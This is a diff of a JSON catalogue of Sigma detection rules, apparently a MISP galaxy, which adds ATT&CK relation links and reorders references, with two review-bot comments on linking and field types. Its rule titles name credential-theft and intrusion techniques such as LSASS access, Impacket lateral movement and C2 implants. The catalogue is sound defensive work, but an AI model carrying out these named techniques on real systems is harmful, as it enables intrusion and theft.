"https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ @@ -29267,6 +37091,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "value": "Recon Activity with NLTEST" }, @@ -29291,6 +37124,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "value": "Netsh RDP Port Opening" }, 
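Review bot: The `@@ -29253,12 +37079,10 @@` hunk removes both `https://attack.mitre.org/techniques/T1482/` and `https://attack.mitre.org/techniques/T1016/`, but the `related` block added in the next hunk carries a single entry, `767dbf9e-df3f-45cb-8998-4903ab5f80c0`, which is the UUID this patch pairs with `attack.t1482` elsewhere (Suspicious LDAP Domain Access). If the rule is also tagged `attack.t1016` — the removed reference suggests it is, though the tag list is cut off above the hunk — the T1016 link is lost rather than converted into a relation. Suggest confirming that the generator emits one related entry per `attack.tNNNN` tag before stripping the MITRE URLs from refs, since those URLs were the only machine-readable technique link until now.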
@@ -29315,6 +37157,15 @@ "attack.t1505.002" ] }, + "related": [ + { + "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", "value": "MSExchange Transport Agent Installation" }, @@ -29342,6 +37193,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", "value": "CMSTP Execution Process Creation" }, @@ -29373,6 +37233,36 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", "value": "WannaCry Ransomware" }, @@ -29397,6 +37287,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", "value": "Suspicious Add Scheduled Task From User AppData Temp" }, 
@@ -29422,6 +37321,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "438025f9-5856-4663-83f7-52f878a70a50", "value": "Microsoft Office Product Spawning Windows Shell" }, @@ -29447,6 +37355,22 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "value": "Suspicious XOR Encoded PowerShell Command Line" }, @@ -29463,8 +37387,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/mandiant/SharPersist", + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" ], "tags": [ @@ -29514,8 +37438,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/SharpHound", "https://github.com/BloodHoundAD/BloodHound", + "https://github.com/BloodHoundAD/SharpHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" ], "tags": [ 
@@ -29529,6 +37453,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "value": "Bloodhound and Sharphound Hack Tool" }, @@ -29545,8 +37506,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" ], "tags": [ @@ -29554,6 +37515,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" }, 
@@ -29580,6 +37550,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "value": "WMI Persistence - Script Event Consumer" }, @@ -29605,6 +37584,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42333b2c-b425-441c-b70e-99404a17170f", "value": "Sliver C2 Implant Activity Pattern" }, @@ -29653,6 +37641,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "value": "Suspicious Processes Spawned by WinRM" }, @@ -29723,6 +37720,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "value": "F-Secure C3 Load by Rundll32" }, @@ -29739,8 +37745,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Oddvarmoe/status/1270633613449723905", "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://twitter.com/Oddvarmoe/status/1270633613449723905", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" ], "tags": [ 
@@ -29748,6 +37754,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", "value": "Cmd.exe CommandLine Path Traversal" }, @@ -29796,6 +37811,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", "value": "Suspicious Sigverif Execution" }, @@ -29822,6 +37846,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74403157-20f5-415d-89a7-c505779585cf", "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString" }, @@ -29870,6 +37903,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", "value": "Suspicious Diantz Download and Compress Into a CAB File" }, @@ -29888,9 +37930,9 @@ "refs": [ "https://isc.sans.edu/diary/22264", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" ], "tags": [ 
@@ -29901,6 +37943,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "value": "Bitsadmin Download from Suspicious Domain" }, @@ -29917,9 +37975,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1534915321856917506", - "https://twitter.com/nas_bench/status/1534916659676422152", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://twitter.com/nas_bench/status/1534915321856917506", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" ], "tags": [ @@ -29928,6 +37986,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", "value": "Use of Adplus.exe" }, @@ -29944,8 +38011,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd2.html#using", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" ], 
@@ -29955,6 +38022,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", "value": "NirCmd Tool Execution As LOCAL SYSTEM" }, @@ -29981,6 +38057,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets" }, @@ -30006,6 +38091,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "966e4016-627f-44f7-8341-f394905c361f", "value": "WMIExec VBS Script" }, @@ -30033,7 +38127,7 @@ "value": "Taskmgr as LOCAL_SYSTEM" }, { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "meta": { "author": "Florian Roth", "creation_date": "2021/04/23", @@ -30053,6 +38147,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "value": "PowerShell Get-Process LSASS" }, 
@@ -30078,6 +38181,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", "value": "Use Of The SFTP.EXE Binary As A LOLBIN" }, @@ -30104,6 +38216,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", "value": "UAC Bypass Using IDiagnostic Profile" }, @@ -30120,8 +38241,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", "https://twitter.com/harr0ey/status/989617817849876488", + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" ], "tags": [ @@ -30129,6 +38250,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "value": "Code Execution via Pcwutl.dll" }, @@ -30181,6 +38311,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", "value": "Conhost.exe CommandLine Path Traversal" }, 
@@ -30206,6 +38345,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "value": "Renamed jusched.exe" }, @@ -30232,6 +38380,15 @@ "attack.t1222.001" ] }, + "related": [ + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", "value": "Suspicious Recursive Takeown" }, @@ -30281,6 +38438,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "value": "UAC Bypass Using Windows Media Player - Process" }, @@ -30305,6 +38471,15 @@ "attack.t1572" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "value": "Suspicious Plink Usage RDP Tunneling" }, @@ -30353,6 +38528,15 @@ "attack.t1055.001" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", "value": "TAIDOOR RAT DLL Load" }, @@ -30377,6 +38561,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "value": "SystemNightmare Exploitation Script Execution" }, 
@@ -30393,9 +38586,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.echotrail.io/insights/search/wermgr.exe",
- "https://github.com/binderlabs/DirCreate2System",
 "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
+ "https://github.com/binderlabs/DirCreate2System",
+ "https://www.echotrail.io/insights/search/wermgr.exe",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml"
 ],
 "tags": "No established tags"
@@ -30425,6 +38618,15 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e",
 "value": "Suspicious RASdial Activity"
 },
@@ -30441,8 +38643,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/cyb3rops/status/1562072617552678912",
 "https://ss64.com/nt/cmd.html",
+ "https://twitter.com/cyb3rops/status/1562072617552678912",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml"
 ],
 "tags": [
@@ -30450,6 +38652,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd",
 "value": "Missing Space Characters in Command Lines"
 },
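Review bot: `"tags": "No established tags"` in the wermgr entry (first hunk on this line) gives `meta.tags` a string value where every other entry in this file uses an array, so a consumer that iterates the tags of each cluster will iterate characters or fail on this one entry. The line is unchanged context, but the commit regenerates the whole file and is the natural place to normalise it; `"tags": []` (or omitting the key) keeps the field's type stable across entries. The enclosing entry starts before this hunk, so I cannot see whether the generator writes this sentinel for every rule without tags or only here.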
@@ -30466,10 +38677,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://twitter.com/Hexacorn/status/1187143326673330176", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://redcanary.com/blog/raspberry-robin/", + "https://twitter.com/Hexacorn/status/1187143326673330176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" ], "tags": [ @@ -30477,6 +38688,15 @@ "attack.t1218.008" ] }, + "related": [ + { + "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" }, @@ -30502,6 +38722,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "value": "Download Arbitrary Files Via MSPUB.EXE" }, @@ -30527,6 +38756,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", "value": "Abusing Permissions Using Dsacls" }, 
@@ -30552,6 +38790,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "value": "Perl Inline Command Execution" }, @@ -30579,6 +38826,15 @@ "attack.t1615" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", "value": "Gpresult Display Group Policy Information" }, @@ -30595,8 +38851,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", "https://github.com/carlospolop/PEASS-ng", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" ], "tags": [ @@ -30631,6 +38887,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "value": "Execution via stordiag.exe" }, 
@@ -30647,8 +38912,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" @@ -30660,6 +38925,22 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", "value": "Impacket Lateralization Detection" }, @@ -30686,6 +38967,22 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "value": "Execute Code with Pester.bat" }, 
@@ -30757,6 +39054,15 @@ "cve.2021.35211" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75578840-9526-4b2a-9462-af469a45e767", "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" }, @@ -30773,9 +39079,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" ], "tags": [ @@ -30783,6 +39089,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "value": "Sensitive Registry Access via Volume Shadow Copy" }, @@ -30807,6 +39122,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "value": "Unusual Parent Process for cmd.exe" }, 
@@ -30833,6 +39157,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", "value": "Suspicious Base64 Encoded Powershell Invoke" }, @@ -30857,6 +39190,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "value": "File Download with Headless Browser" }, @@ -30882,6 +39224,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "value": "UAC Bypass Using PkgMgr and DISM" }, @@ -30907,6 +39258,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "value": "Lolbin Runexehelper Use As Proxy" }, @@ -30957,6 +39317,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "value": "Winword LOLBIN Usage" }, 
